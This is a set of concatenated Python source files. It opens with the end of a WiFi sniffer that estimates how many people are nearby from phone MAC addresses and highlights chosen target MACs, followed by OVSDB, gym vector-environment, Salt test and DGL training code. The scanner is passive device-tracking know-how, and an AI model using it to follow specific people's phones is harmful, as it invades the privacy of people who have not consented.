print(line)
if line.strip() == '':
continue
mac = line.split()[0].strip().split(',')[0]
dats = line.split()
if len(dats) == 3:
if ':' not in dats[0] or len(dats) != 3:
continue
if mac not in foundMacs:
foundMacs[mac] = []
dats_2_split = dats[2].split(',')
if len(dats_2_split) > 1:
rssi = float(dats_2_split[0]) / 2 + float(dats_2_split[1]) / 2
else:
rssi = float(dats_2_split[0])
foundMacs[mac].append(rssi)
if not foundMacs:
print("Found no signals, are you sure %s supports monitor mode?" % adapter)
sys.exit(1)
for key, value in foundMacs.items():
foundMacs[key] = float(sum(value)) / float(len(value))
# Find target MAC address in foundMacs
if targetmacset:
sys.stdout.write(RED)
for mac in foundMacs:
if mac in targetmacset:
print("Found MAC address: %s" % mac)
print("rssi: %s" % str(foundMacs[mac]))
sys.stdout.write(RESET)
if manufacturers:
f = open(manufacturers,'r')
cellphone = [line.rstrip('\n') for line in f.readlines()]
f.close()
else:
cellphone = [
'Motorola Mobility LLC, a Lenovo Company',
'GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD',
'Huawei Symantec Technologies Co.,Ltd.',
'Microsoft',
'HTC Corporation',
'Samsung Electronics Co.,Ltd',
'SAMSUNG ELECTRO-MECHANICS(THAILAND)',
'BlackBerry RTS',
'LG ELECTRONICS INC',
'Apple, Inc.',
'LG Electronics',
'OnePlus Tech (Shenzhen) Ltd',
'Xiaomi Communications Co Ltd',
'LG Electronics (Mobile Communications)']
cellphone_people = []
for mac in foundMacs:
oui_id = 'Not in OUI'
if mac[:8] in oui:
oui_id = oui[mac[:8]]
if verbose:
print(mac, oui_id, oui_id in cellphone)
if allmacaddresses or oui_id in cellphone:
if not nearby or (nearby and foundMacs[mac] > -70):
cellphone_people.append(
{'company': oui_id, 'rssi': foundMacs[mac], 'mac': mac})
if sort:
cellphone_people.sort(key=lambda x: x['rssi'], reverse=True)
if verbose:
print(json.dumps(cellphone_people, indent=2))
# US / Canada: https://twitter.com/conradhackett/status/701798230619590656
percentage_of_people_with_phones = 0.7
if nocorrection:
percentage_of_people_with_phones = 1
num_people = int(round(len(cellphone_people) /
percentage_of_people_with_phones))
if number and not jsonprint:
print(num_people)
elif jsonprint:
print(json.dumps(cellphone_people, indent=2))
else:
if num_people == 0:
print("No one around (not even you!).")
elif num_people == 1:
print("No one around, but you.")
else:
print("There are about %d people around." % num_people)
if out:
with open(out, 'a') as f:
data_dump = {'cellphones': cellphone_people, 'time': time.time()}
f.write(json.dumps(data_dump) + "\n")
if verbose:
print("Wrote %d records to %s" % (len(cellphone_people), out))
if not pcap:
os.remove(dump_file)
results = {
'records': cellphone_people,
'time': int(time.time()),
'serial': SERIAL,
}
return adapter, results
@click.command()
@click.option('-a', '--adapter', default='', help='adapter to use')
def main(adapter):
scantime = '60'
verbose = False
dictionary = 'oui.txt'
number = True
nearby = False
jsonprint = False
out = ''
allmacaddresses = True
manufacturers = ''
nocorrection = True
sort = False
targetmacs = ''
pcap = ''
while True:
adapter, results = scan(adapter, scantime, verbose, dictionary, number,
nearby, jsonprint, out, allmacaddresses, manufacturers,
nocorrection, sort, targetmacs, pcap)
SEND_BUFFER.append(results)
try:
while len(SEND_BUFFER):
r = requests.post(IOT_URL, json=SEND_BUFFER[0], timeout=5)
r.raise_for_status()
SEND_BUFFER.pop(0)
except:
logging.exception('Problem sending to server:')
if __name__ == '__main__':
main()
|
connection.py
|
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import Queue
import threading
import traceback
from ovs.db import idl
from ovs import poller
from neutron.agent.ovsdb.native import idlutils
class TransactionQueue(Queue.Queue, object):
def __init__(self, *args, **kwargs):
super(TransactionQueue, self).__init__(*args, **kwargs)
alertpipe = os.pipe()
self.alertin = os.fdopen(alertpipe[0], 'r', 0)
self.alertout = os.fdopen(alertpipe[1], 'w', 0)
def get_nowait(self, *args, **kwargs):
try:
result = super(TransactionQueue, self).get_nowait(*args, **kwargs)
except Queue.Empty:
return None
self.alertin.read(1)
return result
def put(self, *args, **kwargs):
super(TransactionQueue, self).put(*args, **kwargs)
self.alertout.write('X')
self.alertout.flush()
@property
def alert_fileno(self):
return self.alertin.fileno()
class Connection(object):
def __init__(self, connection, timeout):
self.idl = None
self.connection = connection
self.timeout = timeout
self.txns = TransactionQueue(1)
self.lock = threading.Lock()
def start(self):
with self.lock:
if self.idl is not None:
return
helper = idlutils.get_schema_helper(self.connection)
helper.register_all()
self.idl = idl.Idl(self.connection, helper)
idlutils.wait_for_change(self.idl, self.timeout)
self.poller = poller.Poller()
self.thread = threading.Thread(target=self.run)
self.thread.setDaemon(True)
self.thread.start()
def run(self):
while True:
self.idl.wait(self.poller)
self.poller.fd_wait(self.txns.alert_fileno, poller.POLLIN)
self.poller.block()
self.idl.run()
txn = self.txns.get_nowait()
if txn is not None:
try:
txn.results.put(txn.do_commit())
except Exception as ex:
er = idlutils.ExceptionResult(ex=ex,
tb=traceback.format_exc())
txn.results.put(er)
self.txns.task_done()
def queue_txn(self, txn):
self.txns.put(txn)
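# ---------------------------------------------------------------------------
# Hedged illustration, not part of the original module: TransactionQueue above
# relies on the "self-pipe" trick so a single poll/select call can wait on both
# queued transactions and OVSDB activity; put() writes one byte to the pipe and
# get_nowait() consumes it. A minimal standalone version of the idea:
def _self_pipe_demo():
    import select
    read_fd, write_fd = os.pipe()
    os.write(write_fd, b'X')                       # "something was queued"
    ready, _, _ = select.select([read_fd], [], [], 0)
    assert ready == [read_fd]                      # the poller wakes up
    os.read(read_fd, 1)                            # consume the wake-up byte
    os.close(read_fd)
    os.close(write_fd)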
|
vec_envs.py
|
import numpy as np
from gym import spaces
# from . import VecEnv
from collections import OrderedDict
from abc import ABC, abstractmethod
import gym
import cloudpickle
import multiprocessing
import pickle
class VecEnv(ABC):
"""
An abstract asynchronous, vectorized environment.
Used to batch data from multiple copies of an environment, so that
    each observation becomes a batch of observations, and the expected action is a batch of actions to
be applied per-environment.
"""
closed = False
viewer = None
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
@abstractmethod
def reset(self):
"""
Reset all the environments and return an array of
observations, or a dict of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
@abstractmethod
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
@abstractmethod
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a dict of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close_extras(self):
"""
Clean up the extra resources, beyond what's in this base class.
Only runs when not self.closed.
"""
pass
def close(self):
if self.closed:
return
if self.viewer is not None:
self.viewer.close()
self.close_extras()
self.closed = True
def step(self, actions):
"""
Step the environments synchronously.
This is available for backwards compatibility.
"""
self.step_async(actions)
return self.step_wait()
def render(self, mode='human'):
imgs = self.get_images()
bigimg = tile_images(imgs)
if mode == 'human':
self.get_viewer().imshow(bigimg)
return self.get_viewer().isopen
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
def get_images(self):
"""
Return RGB images from each environment
"""
raise NotImplementedError
@property
def unwrapped(self):
if isinstance(self, VecEnvWrapper):
return self.venv.unwrapped
else:
return self
def get_viewer(self):
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
return self.viewer
class DummyVecEnv(VecEnv):
"""
    VecEnv that runs multiple environments sequentially, that is,
    the step and reset commands are sent to one environment at a time.
Useful when debugging and when num_env == 1 (in the latter case,
avoids communication overhead)
"""
def __init__(self, env_fns):
"""
Arguments:
        env_fns: iterable of callable functions that build environments
"""
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
VecEnv.__init__(self, len(env_fns), env.observation_space, env.action_space)
obs_space = env.observation_space
if isinstance(obs_space, spaces.MultiDiscrete):
obs_space.shape = obs_space.shape[0]
self.keys, shapes, dtypes = obs_space_info(obs_space)
self.buf_obs = { k: np.zeros((self.num_envs,) + tuple(shapes[k]), dtype=dtypes[k]) for k in self.keys }
        self.buf_dones = np.zeros((self.num_envs,), dtype=bool)
self.buf_rews = np.zeros((self.num_envs,), dtype=np.float32)
self.buf_infos = [{} for _ in range(self.num_envs)]
self.actions = None
def step_async(self, actions):
listify = True
try:
if len(actions) == self.num_envs:
listify = False
except TypeError:
pass
if not listify:
self.actions = actions
else:
assert self.num_envs == 1, "actions {} is either not a list or has a wrong size - cannot match to {} environments".format(actions, self.num_envs)
self.actions = [actions]
def step_wait(self):
for e in range(self.num_envs):
action = self.actions[e]
if isinstance(self.envs[e].action_space, spaces.Discrete):
action = int(action)
obs, self.buf_rews[e], self.buf_dones[e], self.buf_infos[e] = self.envs[e].step(action)
if self.buf_dones[e]:
obs = self.envs[e].reset()
self._save_obs(e, obs)
return (self._obs_from_buf(), np.copy(self.buf_rews), np.copy(self.buf_dones),
self.buf_infos.copy())
def reset(self):
for e in range(self.num_envs):
obs = self.envs[e].reset()
self._save_obs(e, obs)
return self._obs_from_buf()
def _save_obs(self, e, obs):
for k in self.keys:
if k is None:
self.buf_obs[k][e] = obs
else:
self.buf_obs[k][e] = obs[k]
def _obs_from_buf(self):
return dict_to_obs(copy_obs_dict(self.buf_obs))
def get_images(self):
return [env.render(mode='rgb_array') for env in self.envs]
def render(self, mode='human'):
if self.num_envs == 1:
return self.envs[0].render(mode=mode)
else:
return super().render(mode=mode)
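# Minimal usage sketch (assumption, not from the original source): building a
# DummyVecEnv from environment factories; 'CartPole-v1' is only an illustrative
# environment id.
def _example_dummy_vecenv(num_envs=4):
    venv = DummyVecEnv([lambda: gym.make('CartPole-v1') for _ in range(num_envs)])
    obs = venv.reset()
    actions = [venv.action_space.sample() for _ in range(venv.num_envs)]
    obs, rews, dones, infos = venv.step(actions)
    venv.close()
    return obs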
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments, distributing each environment to its own
process, allowing significant speed up when the environment is computationally complex.
For performance reasons, if your environment is not IO bound, the number of environments should not exceed the
number of logical cores on your CPU.
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow sessions or other non thread-safe
libraries are used in the parent (see issue #217). However, compared to
'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods, users must wrap the code in an
``if __name__ == "__main__":`` block.
For more information, see the multiprocessing documentation.
:param env_fns: ([callable]) A list of functions that will create the environments
(each callable returns a `Gym.Env` instance when called).
:param start_method: (str) method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'forkserver' on available platforms, and 'spawn' otherwise.
"""
def __init__(self, env_fns, start_method=None):
self.waiting = False
self.closed = False
self.n_envs = len(env_fns)
n_envs = len(env_fns)
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
forkserver_available = 'forkserver' in multiprocessing.get_all_start_methods()
start_method = 'forkserver' if forkserver_available else 'spawn'
ctx = multiprocessing.get_context(start_method)
self.remotes, self.work_remotes = zip(*[ctx.Pipe(duplex=True) for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes, env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = ctx.Process(target=_worker, args=args, daemon=True) # pytype:disable=attribute-error
process.start()
self.processes.append(process)
work_remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs, self.observation_space), np.stack(rews), np.stack(dones), infos
def seed(self, seed=None):
if seed is None:  # avoid TypeError on None + idx below
seed = np.random.randint(0, 2**31 - 1)
for idx, remote in enumerate(self.remotes):
remote.send(('seed', seed + idx))
return [remote.recv() for remote in self.remotes]
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
obs = [remote.recv() for remote in self.remotes]
return _flatten_obs(obs, self.observation_space)
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for process in self.processes:
process.join()
self.closed = True
def get_images(self, *args, **kwargs):
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(('render', (args, {'mode': 'rgb_array', **kwargs})))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self, attr_name, indices=None):
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(('get_attr', attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self, attr_name, value, indices=None):
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(('set_attr', (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self, method_name, *method_args, indices=None, **method_kwargs):
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(('env_method', (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices):
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: (None,int,Iterable) refers to indices of envs.
:return: ([multiprocessing.Connection]) Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
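# Minimal usage sketch (assumption, not from the original source). As the class
# docstring notes, the 'forkserver'/'spawn' start methods require construction
# to happen under an ``if __name__ == "__main__":`` guard in the calling script.
def _example_subproc_vecenv(num_envs=4):
    def make_env():
        return gym.make('CartPole-v1')   # illustrative environment id
    venv = SubprocVecEnv([make_env for _ in range(num_envs)], start_method='spawn')
    obs = venv.reset()
    actions = [venv.action_space.sample() for _ in range(venv.num_envs)]
    obs, rews, dones, infos = venv.step(actions)
    venv.close()
    return obs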
### HELPER CLASSES / FNS
def _worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.var()
while True:
try:
cmd, data = remote.recv()
if cmd == 'step':
observation, reward, done, info = env.step(data)
if done:
# save final observation where user can get it, then reset
info['terminal_observation'] = observation
observation = env.reset()
remote.send((observation, reward, done, info))
elif cmd == 'seed':
remote.send(env.seed(data))
elif cmd == 'reset':
observation = env.reset()
remote.send(observation)
elif cmd == 'render':
remote.send(env.render(*data[0], **data[1]))
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
elif cmd == 'env_method':
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == 'get_attr':
remote.send(getattr(env, data))
elif cmd == 'set_attr':
remote.send(setattr(env, data[0], data[1]))
else:
raise NotImplementedError
except EOFError:
break
class CloudpickleWrapper(object):
def __init__(self, var):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
:param var: (Any) the variable you wish to wrap for pickling with cloudpickle
"""
self.var = var
def __getstate__(self):
return cloudpickle.dumps(self.var)
def __setstate__(self, obs):
self.var = pickle.loads(obs)
def copy_obs_dict(obs):
"""
Deep-copy an observation dict.
"""
return {k: np.copy(v) for k, v in obs.items()}
def dict_to_obs(obs_dict):
"""
Convert an observation dict into a raw array if the
original observation space was not a Dict space.
"""
if set(obs_dict.keys()) == {None}:
return obs_dict[None]
return obs_dict
def obs_space_info(obs_space):
"""
Get dict-structured information about a gym.Space.
Returns:
A tuple (keys, shapes, dtypes):
keys: a list of dict keys.
shapes: a dict mapping keys to shapes.
dtypes: a dict mapping keys to dtypes.
"""
if isinstance(obs_space, gym.spaces.Dict):
assert isinstance(obs_space.spaces, OrderedDict)
subspaces = obs_space.spaces
else:
subspaces = {None: obs_space}
keys = []
shapes = {}
dtypes = {}
for key, box in subspaces.items():
keys.append(key)
shapes[key] = box.shape
dtypes[key] = box.dtype
return keys, shapes, dtypes
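# Illustrative sketch (assumption): obs_space_info reports per-key information
# for Dict spaces and uses the single key ``None`` for any other space.
def _example_obs_space_info():
    space = gym.spaces.Dict(OrderedDict([
        ('position', gym.spaces.Box(low=-1.0, high=1.0, shape=(2,), dtype=np.float32)),
        ('on_ground', gym.spaces.Discrete(2)),
    ]))
    keys, shapes, dtypes = obs_space_info(space)
    # keys == ['position', 'on_ground'], shapes['position'] == (2,)
    return keys, shapes, dtypes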
def obs_to_dict(obs):
"""
Convert an observation into a dict.
"""
if isinstance(obs, dict):
return obs
return {None: obs}
def _flatten_obs(obs, space):
"""
Flatten observations, depending on the observation space.
:param obs: (list<X> or tuple<X> where X is dict<ndarray>, tuple<ndarray> or ndarray) observations.
A list or tuple of observations, one per environment.
Each environment observation may be a NumPy array, or a dict or tuple of NumPy arrays.
:return (OrderedDict<ndarray>, tuple<ndarray> or ndarray) flattened observations.
A flattened NumPy array or an OrderedDict or tuple of flattened numpy arrays.
Each NumPy array has the environment index as its first axis.
"""
assert isinstance(obs, (list, tuple)), "expected list or tuple of observations per environment"
assert len(obs) > 0, "need observations from at least one environment"
if isinstance(space, gym.spaces.Dict):
assert isinstance(space.spaces, OrderedDict), "Dict space must have ordered subspaces"
assert isinstance(obs[0], dict), "non-dict observation for environment with Dict observation space"
return OrderedDict([(k, np.stack([o[k] for o in obs])) for k in space.spaces.keys()])
elif isinstance(space, gym.spaces.Tuple):
assert isinstance(obs[0], tuple), "non-tuple observation for environment with Tuple observation space"
obs_len = len(space.spaces)
return tuple((np.stack([o[i] for o in obs]) for i in range(obs_len)))
else:
return np.stack(obs)
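# Illustrative sketch (assumption): _flatten_obs stacks the per-environment
# observations along a new leading environment axis.
def _example_flatten_obs(num_envs=4):
    space = gym.spaces.Box(low=-1.0, high=1.0, shape=(3,), dtype=np.float32)
    per_env_obs = [np.zeros(3, dtype=np.float32) for _ in range(num_envs)]
    stacked = _flatten_obs(per_env_obs, space)
    return stacked.shape  # (num_envs, 3): environment index first, then obs shape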
|
test_mputil.py
|
import multiprocessing
import time
import pytest
from itertools import product
from astropy.io import fits
from astropy.utils.data import get_pkg_data_filename
from stsci.tools.mputil import launch_and_wait, best_tile_layout
SUPPORTED_START_METHODS = []
for sm in ['spawn', 'fork', 'forkserver']:
try:
multiprocessing.get_context(sm)
SUPPORTED_START_METHODS.append(sm)
except ValueError:
pass
def takes_time(x, img):
"""Example function which takes some time to run."""
time.sleep(0.001) # 1 ms is long by computer standards?
@pytest.mark.parametrize('fname, method', (
x for x in product([None, 'data/o4sp040b0_raw.fits'],
SUPPORTED_START_METHODS)
))
def test_launch_and_wait(fname, method):
"""Illustrate use of launch_and_wait"""
p = None
subprocs = []
# Passing fits.HDUList in Python 3.8 would cause crash due to spawn start
# method:
#
if fname is None:
img = None
else:
img = fits.open(get_pkg_data_filename(fname))
for item in range(2, 5):
mp_ctx = multiprocessing.get_context(method)
p = mp_ctx.Process(target=takes_time, args=(item, img),
name='takes_time()')
subprocs.append(p)
if method != 'fork' and fname:
with pytest.raises(TypeError):
# launch em, pool-fashion
launch_and_wait(subprocs, 3)
else:
launch_and_wait(subprocs, 3)
if img:
img.close()
def test_best_tile_layout():
"""Loop though some numbers and make sure we get expected results."""
for i in range(257):
x, y = best_tile_layout(i)
assert (x * y <= i) or (i == 0), \
"Total num resulting tiles > pool_size"
unused_cores = i - (x * y)
# print(i, (x,y), unused_cores)
if i < 10:
assert unused_cores <= 1, "Too many idle cores at i = " + str(i)
else:
percent_unused = 100. * ((unused_cores * 1.) / i)
assert percent_unused < 14., "Too many idle cores at i: " + str(i)
|
state.py
|
# -*- coding: utf-8 -*-
'''
Tests for the state runner
'''
# Import Python Libs
from __future__ import absolute_import
import errno
import os
import shutil
import signal
import tempfile
import textwrap
import yaml
import threading
from salt.ext.six.moves import queue
# Import Salt Testing Libs
from salttesting import skipIf
from salttesting.helpers import ensure_in_syspath
ensure_in_syspath('../../')
import integration
# Import Salt Libs
import salt.utils
import salt.utils.event
class StateRunnerTest(integration.ShellCase):
'''
Test the state runner.
'''
def add_to_queue(self, q, cmd):
'''
helper method to add salt-run
return data to a queue
'''
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
def test_orchestrate_output(self):
'''
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
and not the full stateful return. This test ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
'''
#ret_output = self.run_run_plus('state.orchestrate', 'orch.simple')['out']
ret_output = self.run_run('state.orchestrate orch.simple')
bad_out = ['outputter:', ' highstate']
good_out = [' Function: salt.state',
' Result: True',
'Succeeded: 1 (changed=1)',
'Failed: 0',
'Total states run: 1']
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
self.assertNotEqual(bad_out, ret_output)
# Now test that some expected good sample output is present in the return.
for item in good_out:
self.assertIn(item, ret_output)
def test_orchestrate_nested(self):
'''
test salt-run state.orchestrate and failhard with nested orchestration
'''
if os.path.exists('/tmp/ewu-2016-12-13'):
os.remove('/tmp/ewu-2016-12-13')
_, code = self.run_run(
'state.orchestrate nested-orch.outer',
with_retcode=True)
self.assertFalse(os.path.exists('/tmp/ewu-2016-12-13'))
self.assertNotEqual(code, 0)
def test_state_event(self):
'''
test to ensure state.event
runner returns correct data
'''
q = queue.Queue(maxsize=0)
cmd = 'state.event salt/job/*/new count=1'
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
server_thread.setDaemon(True)
server_thread.start()
while q.empty():
self.run_salt('minion test.ping --static')
out = q.get()
self.assertIn(expect, str(out))
server_thread.join()
@skipIf(salt.utils.is_windows(), '*NIX-only test')
class OrchEventTest(integration.ShellCase):
'''
Tests for orchestration events
'''
def setUp(self):
self.timeout = 60
self.master_d_dir = os.path.join(self.get_config_dir(), 'master.d')
try:
os.makedirs(self.master_d_dir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
self.conf = tempfile.NamedTemporaryFile(
mode='w',
suffix='.conf',
dir=self.master_d_dir,
delete=True,
)
self.base_env = tempfile.mkdtemp(dir=integration.TMP)
def tearDown(self):
shutil.rmtree(self.base_env)
self.conf.close()
# Force a reload of the configuration now that our temp config file has
# been removed.
self.run_run_plus('test.arg', __reload_config=True)
def alarm_handler(self, signal, frame):
raise Exception('Timeout of {0} seconds reached'.format(self.timeout))
def write_conf(self, data):
'''
Dump the config dict to the conf file
'''
self.conf.write(yaml.dump(data, default_flow_style=False))
self.conf.flush()
def test_jid_in_ret_event(self):
'''
Test to confirm that the ret event for the orchestration contains the
jid for the jobs spawned.
'''
self.write_conf({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [self.base_env],
},
})
state_sls = os.path.join(self.base_env, 'test_state.sls')
with salt.utils.fopen(state_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
date:
cmd.run
'''))
orch_sls = os.path.join(self.base_env, 'test_orch.sls')
with salt.utils.fopen(orch_sls, 'w') as fp_:
fp_.write(textwrap.dedent('''
date_cmd:
salt.state:
- tgt: minion
- sls: test_state
ping_minion:
salt.function:
- name: test.ping
- tgt: minion
fileserver.file_list:
salt.runner
config.values:
salt.wheel
'''))
listener = salt.utils.event.get_event(
'master',
sock_dir=self.master_opts['sock_dir'],
transport=self.master_opts['transport'],
opts=self.master_opts)
jid = self.run_run_plus(
'state.orchestrate',
'test_orch',
__reload_config=True).get('jid')
if jid is None:
raise Exception('jid missing from run_run_plus output')
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event['tag'] == 'salt/run/{0}/ret'.format(jid):
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event['data']['return']['data']['master']
for job in ret:
self.assertTrue('__jid__' in ret[job])
break
finally:
signal.alarm(0)
if __name__ == '__main__':
from integration import run_tests
run_tests(StateRunnerTest)
run_tests(OrchEventTest)
|
train_cv_multi_gpu.py
|
import dgl
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.multiprocessing as mp
import dgl.function as fn
import dgl.nn.pytorch as dglnn
import time
import argparse
import tqdm
import traceback
import math
from _thread import start_new_thread
from functools import wraps
from dgl.data import RedditDataset
from torch.utils.data import DataLoader
from torch.nn.parallel import DistributedDataParallel
class SAGEConvWithCV(nn.Module):
def __init__(self, in_feats, out_feats, activation):
super().__init__()
self.W = nn.Linear(in_feats * 2, out_feats)
self.activation = activation
self.reset_parameters()
def reset_parameters(self):
gain = nn.init.calculate_gain('relu')
nn.init.xavier_uniform_(self.W.weight, gain=gain)
nn.init.constant_(self.W.bias, 0)
def forward(self, block, H, HBar=None):
if self.training:
with block.local_scope():
H_src, H_dst = H
HBar_src, agg_HBar_dst = HBar
block.dstdata['agg_hbar'] = agg_HBar_dst
block.srcdata['hdelta'] = H_src - HBar_src
block.update_all(fn.copy_u('hdelta', 'm'), fn.mean('m', 'hdelta_new'))
h_neigh = block.dstdata['agg_hbar'] + block.dstdata['hdelta_new']
h = self.W(th.cat([H_dst, h_neigh], 1))
if self.activation is not None:
h = self.activation(h)
return h
else:
with block.local_scope():
H_src, H_dst = H
block.srcdata['h'] = H_src
block.update_all(fn.copy_u('h', 'm'), fn.mean('m', 'h_new'))
h_neigh = block.dstdata['h_new']
h = self.W(th.cat([H_dst, h_neigh], 1))
if self.activation is not None:
h = self.activation(h)
return h
class SAGE(nn.Module):
def __init__(self,
in_feats,
n_hidden,
n_classes,
n_layers,
activation):
super().__init__()
self.n_layers = n_layers
self.n_hidden = n_hidden
self.n_classes = n_classes
self.layers = nn.ModuleList()
self.layers.append(SAGEConvWithCV(in_feats, n_hidden, activation))
for i in range(1, n_layers - 1):
self.layers.append(SAGEConvWithCV(n_hidden, n_hidden, activation))
self.layers.append(SAGEConvWithCV(n_hidden, n_classes, None))
def forward(self, blocks):
h = blocks[0].srcdata['features']
updates = []
for layer, block in zip(self.layers, blocks):
# We need to first copy the representation of nodes on the RHS from the
# appropriate nodes on the LHS.
# Note that the shape of h is (num_nodes_LHS, D) and the shape of h_dst
# would be (num_nodes_RHS, D)
h_dst = h[:block.number_of_dst_nodes()]
hbar_src = block.srcdata['hist']
agg_hbar_dst = block.dstdata['agg_hist']
# Then we compute the updated representation on the RHS.
# The shape of h now becomes (num_nodes_RHS, D)
h = layer(block, (h, h_dst), (hbar_src, agg_hbar_dst))
block.dstdata['h_new'] = h
return h
def inference(self, g, x, batch_size, device):
"""
Inference with the GraphSAGE model on full neighbors (i.e. without neighbor sampling).
g : the entire graph.
x : the input features of the entire node set.
The inference code is written so that it can handle any number of nodes and
layers.
"""
# During inference with sampling, multi-layer blocks are very inefficient because
# lots of computations in the first few layers are repeated.
# Therefore, we compute the representation of all nodes layer by layer. The nodes
# on each layer are of course split into batches.
# TODO: can we standardize this?
nodes = th.arange(g.number_of_nodes())
for l, layer in enumerate(self.layers):
y = g.ndata['hist_%d' % (l + 1)]
for start in tqdm.trange(0, len(nodes), batch_size):
end = start + batch_size
batch_nodes = nodes[start:end]
block = dgl.to_block(dgl.in_subgraph(g, batch_nodes), batch_nodes)
induced_nodes = block.srcdata[dgl.NID]
h = x[induced_nodes].to(device)
block = block.to(device)
h_dst = h[:block.number_of_dst_nodes()]
h = layer(block, (h, h_dst))
y[start:end] = h.cpu()
x = y
return y
class NeighborSampler(object):
def __init__(self, g, fanouts):
self.g = g
self.fanouts = fanouts
def sample_blocks(self, seeds):
seeds = th.LongTensor(seeds)
blocks = []
hist_blocks = []
for fanout in self.fanouts:
# For each seed node, sample ``fanout`` neighbors.
frontier = dgl.sampling.sample_neighbors(self.g, seeds, fanout)
# For history aggregation we sample all neighbors.
hist_frontier = dgl.in_subgraph(self.g, seeds)
# Then we compact the frontier into a bipartite graph for message passing.
block = dgl.to_block(frontier, seeds)
hist_block = dgl.to_block(hist_frontier, seeds)
# Obtain the seed nodes for next layer.
seeds = block.srcdata[dgl.NID]
blocks.insert(0, block)
hist_blocks.insert(0, hist_block)
return blocks, hist_blocks
# According to https://github.com/pytorch/pytorch/issues/17199, this decorator
# is necessary to make fork() and openmp work together.
#
# TODO: confirm if this is necessary for MXNet and Tensorflow. If so, we need
# to standardize worker process creation since our operators are implemented with
# OpenMP.
def thread_wrapped_func(func):
@wraps(func)
def decorated_function(*args, **kwargs):
queue = mp.Queue()
def _queue_result():
exception, trace, res = None, None, None
try:
res = func(*args, **kwargs)
except Exception as e:
exception = e
trace = traceback.format_exc()
queue.put((res, exception, trace))
start_new_thread(_queue_result, ())
result, exception, trace = queue.get()
if exception is None:
return result
else:
assert isinstance(exception, Exception)
raise exception.__class__(trace)
return decorated_function
def compute_acc(pred, labels):
"""
Compute the accuracy of prediction given the labels.
"""
return (th.argmax(pred, dim=1) == labels).float().sum() / len(pred)
def evaluate(model, g, labels, val_mask, batch_size, device):
"""
Evaluate the model on the validation set specified by ``val_mask``.
g : The entire graph.
inputs : The features of all the nodes.
labels : The labels of all the nodes.
val_mask : A 0-1 mask indicating which nodes we actually compute the accuracy for.
batch_size : Number of nodes to compute at the same time.
